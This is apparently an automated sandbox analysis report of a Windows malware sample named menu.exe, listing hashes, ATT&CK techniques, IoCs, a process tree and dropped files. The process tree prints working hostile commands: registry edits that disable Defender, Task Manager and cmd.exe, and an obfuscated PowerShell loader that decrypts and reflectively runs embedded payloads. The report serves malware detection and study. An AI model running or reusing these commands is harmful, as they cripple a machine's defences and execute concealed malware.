061282d0c5d8967e46c0b0739488fbefd996615a9059844274b1cb4df83b52bb

Analysis

max time kernel
219s
max time network
563s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
18-11-2024 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

menu.exe
Size

309KB
MD5

b7a65ac9cc1f6ac490080b604dca0209
SHA1

40faa498a2e24a65b8ba74fd8123e63e2432f71f
SHA256

061282d0c5d8967e46c0b0739488fbefd996615a9059844274b1cb4df83b52bb
SHA512

fea5efae6766efd76d1b504ea516dd14eef955e84fec12a9035752366b7d36e078064b2088e04bee30ce267baa899a1b87f5a023316e59d4ecba7387a61943ed
SSDEEP

6144:QGXEB3uR4D7P05EkRTwEur5447h/PcHnUSFIT7JHoI0E7YPWs3kZy:QapW/PqbTw3FcHUSFU1v0E7v

Score

8^/10

discovery evasion execution

Malware Config

Signatures

Blocks application from running via registry modification 3 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "powershell.exe"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2780	powershell.exe

Disables Task Manager via registry modification
evasion

Disables cmd.exe use via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2780	powershell.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe
Token: SeShutdownPrivilege	2744	chrome.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
3060	WScript.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe
2744	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1552 wrote to memory of 2976	1552	menu.exe	31
PID 1552 wrote to memory of 2976	1552	menu.exe	31
PID 1552 wrote to memory of 2976	1552	menu.exe	31
PID 1552 wrote to memory of 2972	1552	menu.exe	33
PID 1552 wrote to memory of 2972	1552	menu.exe	33
PID 1552 wrote to memory of 2972	1552	menu.exe	33
PID 1552 wrote to memory of 3060	1552	menu.exe	35
PID 1552 wrote to memory of 3060	1552	menu.exe	35
PID 1552 wrote to memory of 3060	1552	menu.exe	35
PID 2976 wrote to memory of 2428	2976	cmd.exe	36
PID 2976 wrote to memory of 2428	2976	cmd.exe	36
PID 2976 wrote to memory of 2428	2976	cmd.exe	36
PID 2428 wrote to memory of 2696	2428	net.exe	37
PID 2428 wrote to memory of 2696	2428	net.exe	37
PID 2428 wrote to memory of 2696	2428	net.exe	37
PID 2976 wrote to memory of 2860	2976	cmd.exe	38
PID 2976 wrote to memory of 2860	2976	cmd.exe	38
PID 2976 wrote to memory of 2860	2976	cmd.exe	38
PID 2976 wrote to memory of 2632	2976	cmd.exe	39
PID 2976 wrote to memory of 2632	2976	cmd.exe	39
PID 2976 wrote to memory of 2632	2976	cmd.exe	39
PID 2976 wrote to memory of 2592	2976	cmd.exe	40
PID 2976 wrote to memory of 2592	2976	cmd.exe	40
PID 2976 wrote to memory of 2592	2976	cmd.exe	40
PID 2976 wrote to memory of 2620	2976	cmd.exe	41
PID 2976 wrote to memory of 2620	2976	cmd.exe	41
PID 2976 wrote to memory of 2620	2976	cmd.exe	41
PID 2976 wrote to memory of 3044	2976	cmd.exe	42
PID 2976 wrote to memory of 3044	2976	cmd.exe	42
PID 2976 wrote to memory of 3044	2976	cmd.exe	42
PID 2976 wrote to memory of 2848	2976	cmd.exe	43
PID 2976 wrote to memory of 2848	2976	cmd.exe	43
PID 2976 wrote to memory of 2848	2976	cmd.exe	43
PID 2976 wrote to memory of 2648	2976	cmd.exe	44
PID 2976 wrote to memory of 2648	2976	cmd.exe	44
PID 2976 wrote to memory of 2648	2976	cmd.exe	44
PID 2976 wrote to memory of 2772	2976	cmd.exe	45
PID 2976 wrote to memory of 2772	2976	cmd.exe	45
PID 2976 wrote to memory of 2772	2976	cmd.exe	45
PID 2972 wrote to memory of 2780	2972	cmd.exe	46
PID 2972 wrote to memory of 2780	2972	cmd.exe	46
PID 2972 wrote to memory of 2780	2972	cmd.exe	46
PID 2744 wrote to memory of 2944	2744	chrome.exe	48
PID 2744 wrote to memory of 2944	2744	chrome.exe	48
PID 2744 wrote to memory of 2944	2744	chrome.exe	48
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50
PID 2744 wrote to memory of 1984	2744	chrome.exe	50

C:\Users\Admin\AppData\Local\Temp\menu.exe
"C:\Users\Admin\AppData\Local\Temp\menu.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Roaming\load.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:2696
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
    3⤵
    PID:2860
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f
    3⤵
    - Disables cmd.exe use via registry modification
    PID:2632
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    3⤵
    PID:2592
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 4 /f
    3⤵
    PID:2620
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v "DisableMSI" /t REG_DWORD /d 1 /f
    3⤵
    PID:3044
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:2848
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
    3⤵
    - Blocks application from running via registry modification
    PID:2648
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:2772
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Roaming\loader.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IRcHV6wpyUlV7FCq3bjBVC6HnvFYqZVt3VMM1/rthAU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ot9DBajrhd5olnzo/saVIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DyDjK=New-Object System.IO.MemoryStream(,$param_var); $nXYTA=New-Object System.IO.MemoryStream; $riGTr=New-Object System.IO.Compression.GZipStream($DyDjK, [IO.Compression.CompressionMode]::Decompress); $riGTr.CopyTo($nXYTA); $riGTr.Dispose(); $DyDjK.Dispose(); $nXYTA.Dispose(); $nXYTA.ToArray();}function execute_function($param_var,$param2_var){ $dwlZo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UVtXb=$dwlZo.EntryPoint; $UVtXb.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\loader.bat';$InQWi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\loader.bat').Split([Environment]::NewLine);foreach ($XQbNl in $InQWi) { if ($XQbNl.StartsWith(':: ')) { $WcJMs=$XQbNl.Substring(3); break; }}$payloads_var=[string[]]$WcJMs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2780
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ran.vbs"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:3060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72c9758,0x7fef72c9768,0x7fef72c9778
  2⤵
  PID:2944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:2
  2⤵
  PID:1984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1540 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:8
  2⤵
  PID:2244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1656 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:8
  2⤵
  PID:1960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2284 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:1
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2324 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:1
  2⤵
  PID:2080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3260 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:2
  2⤵
  PID:632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1376 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:1
  2⤵
  PID:1880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3796 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:8
  2⤵
  PID:2084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3664 --field-trial-handle=1216,i,4487823934142425825,6249782424337709320,131072 /prefetch:1
  2⤵
  PID:2616

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\32d1c724-1c53-4faa-a25d-07413f3862bf.tmp

Filesize
6KB

MD5
599683493957014e745d8dbcb8e54d93

SHA1
d54bafa0d9a31723f639ade88f55229165876f3d

SHA256
cb2667a5c9cb21c273d6e4162d69432bc6b28400615f3b8fb816067f13f84ce2

SHA512
78623cccb3f32626b52067f626da2244b36b12b90b5e0ac8f5ea5df7e9e04939a263011a7b35c471cc3077f58c9b51e1a97bdb75e0221733e4f73a292986e239

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
215KB

MD5
e579aca9a74ae76669750d8879e16bf3

SHA1
0b8f462b46ec2b2dbaa728bea79d611411bae752

SHA256
6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

SHA512
df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
ab773363d9181782787c5fb0e84aa9a2

SHA1
fc36c08240ce8fe841c45ff1df59cef6469a93ca

SHA256
e7b363313619cff12b5997c46c8b40b099dc50a0eeb3b81814aeed072af0ba37

SHA512
975df67083cad79e8c0341e0705207ea2b0092ea4707c6bf0148eb3ee50e20cc9078eb66486c6797bf8cf2bc6db26c0ed800931a07c7b857d9e3bee5ee73924b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
4a45cf5e65b0380713e141b119b46f9e

SHA1
904585e83992e302c62e9eee09e6ab9ddc780b14

SHA256
67315a02cb31ffbf3c763c82305add4576e76782e1e178506ff7184d80a827ce

SHA512
feaec12a0edaec9c848bc2e9bec259a1d5dfca2cef139931864d1b4672fdf45fab74f21d01101beb088ea5748b3b92c0578bf3d481d9dba8a4d1e9df40131264

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
363B

MD5
56a68612dc7df9e1ebc16e4e253dfe45

SHA1
9d63b93a852b7d937a083fc28461e6a191305ba0

SHA256
6f9da59608d05783662bf9ebc65d310c8148db61a89518483a95459c7178d8c5

SHA512
efcb3de7ea7bcdb73590104ee9574219a73746b7855816cee59108b4931cdb94853d2a21513f9fbc386c38aab4a4a53c678dbc533bfa8206f2eb8effb9c381be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
7f9e02da2ef4cb4a91975d951da42d8d

SHA1
6966ff8d4a59f6c79465efed2561926a5dd07e61

SHA256
e922912f3db4bcbb309ce607d6ce3873f79994f02b4af9e79f35c10dc2d6b9ee

SHA512
7e2f676e15ad2dcdbe94a907c7d50c3ff80ff9bbdb06f28e4256927154344dfa191a594441591db997cc52a3017098adadf1077bfe4fd58bc3ca75db2108712c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
be075e8e4bf0272d90aba0e4687c3e1c

SHA1
ac540f2685158b8f2de7aca9eb516182f574db2e

SHA256
e71f7f1bad7749e00c928f648fb7b6a3fd7e1ca36777f643dc65ca9a9413a023

SHA512
8aed13a8424aac895fe5103f3f6bcd8cd4b28de644ab01ef851f2c21668695057acd753372930b550d7566380f3077f00bd82efbb1889b97fb6375a183137a31

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Roaming\load.bat

Filesize
1KB

MD5
cf08811b97cdd3d57685a7841a40e2d4

SHA1
faefa9b229e81eef5d200799c39b5db5511922d2

SHA256
7f27ffda0644c500961f965c6f403f54c41c6df7fb685020cf98f7be6fd5082c

SHA512
695e45bc85be611ca90e92ff5502a707e6ec298f31b6113be2537be78beda222d52751f090b0dda752e2880ac08c62c6d80f4fdd371b2721f1c728d9ebd1002a

Download Submit
C:\Users\Admin\AppData\Roaming\loader.bat

Filesize
291KB

MD5
d05f7937bc9eef5bf3042a8a2ecd2f08

SHA1
15230c5d5506e80ac6cecd06a21bea1a44aeef08

SHA256
b981829c3b1026c432c08bc8a65bc1a848750596e01a065bcacef49c128f7226

SHA512
42954c12e551ff742ab466b416f805d93632cafab1bd2c825b16dcb4f838d7914e61e84cf46744d081d0e6424a3afd335cd169cf8e9c0b6d83733f45eba71c95

Download Submit
C:\Users\Admin\AppData\Roaming\ran.vbs

Filesize
4KB

MD5
be03bd7bd0315142da6482ee8075f97d

SHA1
44242df82433922b5dae792842d18da1eccac112

SHA256
f245b406955a4a335f5eb76ef8e48958c55be9e7e667545e95602440c64ee9ae

SHA512
55230398878d8cbca4b14a93b9e5cae00790f845140f28c9c82c622e7bc53eb4c9875de281eb3ba280478cbecbe56eb6a1720832e9afc6607daeafb83f83e7e9

Download Submit
memory/1552-0-0x000007FEF5BD3000-0x000007FEF5BD4000-memory.dmp

Filesize
4KB

Download
memory/1552-1-0x0000000000290000-0x00000000002E4000-memory.dmp

Filesize
336KB

Download
memory/2780-29-0x0000000002910000-0x0000000002918000-memory.dmp

Filesize
32KB

Download
memory/2780-28-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download